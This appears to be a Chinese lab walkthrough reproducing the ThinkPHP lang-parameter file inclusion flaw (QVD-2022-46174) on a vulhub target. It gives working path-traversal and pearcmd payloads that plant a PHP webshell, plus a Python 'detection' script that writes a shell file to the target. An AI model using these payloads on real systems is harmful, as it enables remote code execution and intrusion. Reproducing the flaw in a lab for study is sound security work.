本文主要是介绍ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1 漏洞描述
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。
影响版本
6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x
2 漏洞环境部署
进入目录 cd vulhub/thinkphp/lang-rce 部署环境 docker-compose up -d 查看端口 docker-compose ps
访问服务器,表示环境正在成功运行。
3 利用方式
首先,由于多语言功能默认未启用,因此可以尝试包含 以确定是否存在漏洞:
http://192.168.135.132:8080/?lang=../../../../../public/index
如果服务器崩溃并返回 500 错误响应,则存在该漏洞。
然后,尝试通过“/usr/local/lib/php/pearcmd.php”写入数据:
使用如下payload:
http://192.168.135.132:8080/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
访问写入的文件
写入一句话木马payload
http://192.168.135.132:8080/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval(@$_POST['password']);?>+shell2.php
使用蚁剑链接
4 使用python脚本探测漏洞
#!/usr/bin/env python
import requests
from urllib.parse import urljoin
def thinkphp6_lang(url):payload=urljoin(url,'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php')response=requests.get(payload,verify=False)url2=url+'shell.php'response2=requests.get(url2,verify=False)if response2.status_code == 200:print("漏洞存在")else:print("漏洞不存在")
if __name__ == '__main__':print("注意:本代码仅用于实验和学习目的,请谨慎使用。")url = input("请输入目标 URL: ")thinkphp6_lang(url)
结果
这篇关于ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
